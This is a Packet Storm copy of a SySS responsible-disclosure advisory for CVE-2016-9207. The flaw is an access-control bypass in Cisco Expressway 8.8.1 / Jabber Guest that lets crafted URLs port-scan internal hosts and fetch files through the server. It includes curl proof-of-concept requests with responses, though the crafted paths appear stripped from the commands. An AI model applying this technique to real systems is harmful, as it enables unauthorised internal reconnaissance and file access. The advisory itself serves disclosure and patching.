what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Expressway 8.8.1 Internal Scanning

Cisco Expressway 8.8.1 Internal Scanning
Posted Dec 17, 2016
Authored by Micha Borrmann | Site syss.de

Cisco Expressway version 8.8.1 suffers from an access control bypass that allows an attacker to leverage the application for internal port scanning.

tags | exploit
systems | cisco
SHA-256 | a361dfbad67cdbc85d866b203c31e7071f2f67698c9fe8627ebe4531801d3757

Cisco Expressway 8.8.1 Internal Scanning

Change Mirror Download
Hash: SHA256

Advisory ID: SYSS-2016-115
Product: Expressway
Manufacturer: Cisco
Affected Version(s): below X8.9
Tested Version(s): X8.8.1
Vulnerability Type: Improper Input Validation (CWE-20)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-11-10
Solution Date: 2016-12-05
Public Disclosure: 2016-12-14
CVE Reference: CVE-2016-9207
Author of Advisory: Micha Borrmann, SySS GmbH



Jabber Guest [1] can be used to connect people from the Internet with
enterprise workers using video calls within a web browser.

Due to improper input validation, it is possible by using specially
crafted URLs to perform port scans from the used video communication
server (VCS) [2] of any system which can be reached by it, usually
internal servers. It is also possible to perform denial-of-service
attacks against the VCS by downloading large files.


Vulnerability Details:

A part of the URL is a host name (usually the internal Jabber Guest
server) which will be connected from the EXP-C [3] which acts like a
web proxy, if /jabberc/rest/calls/ is appended to the first "directory".
With a colon (:), it is also possible to specify a target TCP port.
Therefore, anybody, for example an external attacker, can abuse the web-based
application to connect to target systems. If the system is a web
server, it also possible to download files from it.


Proof of Concept (PoC):

This HTTP GET requests connects to the SSH server on localhost:

$ curl --include https://jabberguest.company.com/
HTTP/1.1 200 Connection Established
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:14:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Age: 0

SSH-2.0-OpenSSH_6.6 PKIX
Protocol mismatch.

It can be confirmed, that no SMTP service is running on localhost (very simple port scan):

$ curl --include https://jabberguest.company.com/
HTTP/1.1 502 Connection refused
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:22:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 253
Connection: keep-alive
Cache-Control: no-store
Content-Language: en
Age: 0

<TITLE>Could Not Connect</TITLE>

<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Could Not Connect</H1>

<FONT FACE="Helvetica,Arial"><B>
Description: Could not connect to the server "<EM></EM>".

Connections to other servers are possible, too:

$ curl --include https://jabberguest.company.com/
HTTP/1.1 200 Connection Established
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:13:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Age: 0

SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515
Protocol mismatch.

If a web server contains files within the directory structure
/jabberc/rest/calls/, they can be downloaded via the Jabber Guest via
EXP-E via EXP-C. For demonstration purposes, there was a simple text
file placed at such directory (on a Microsoft Server system which can
also be identified):

$ curl --include https://jabberguest.company.com/
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT
Accept-Ranges: bytes
ETag: "78c1c7984c30d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 10 Nov 2016 09:28:15 GMT
Content-Length: 7
Age: 0
Connection: keep-alive




Update to software version 8.9

More Information:


Disclosure Timeline:

2016-10-27: Vulnerability discovered
2016-11-10: Vulnerability reported to manufacturer
2016-12-05: Patch released by manufacturer
2016-12-07: Public disclosure of vulnerability by manufacturer [4]



[1] Product website for Jabber Guest
[2] Product website for Video Communication Server (VCS)
[3] Product website for Expressway
[4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability
[5] SySS Security Advisory SYSS-2016-115
[6] SySS Responsible Disclosure Policy



This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key ID: 0xEDBE26E714EA58760
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876



The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web



Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By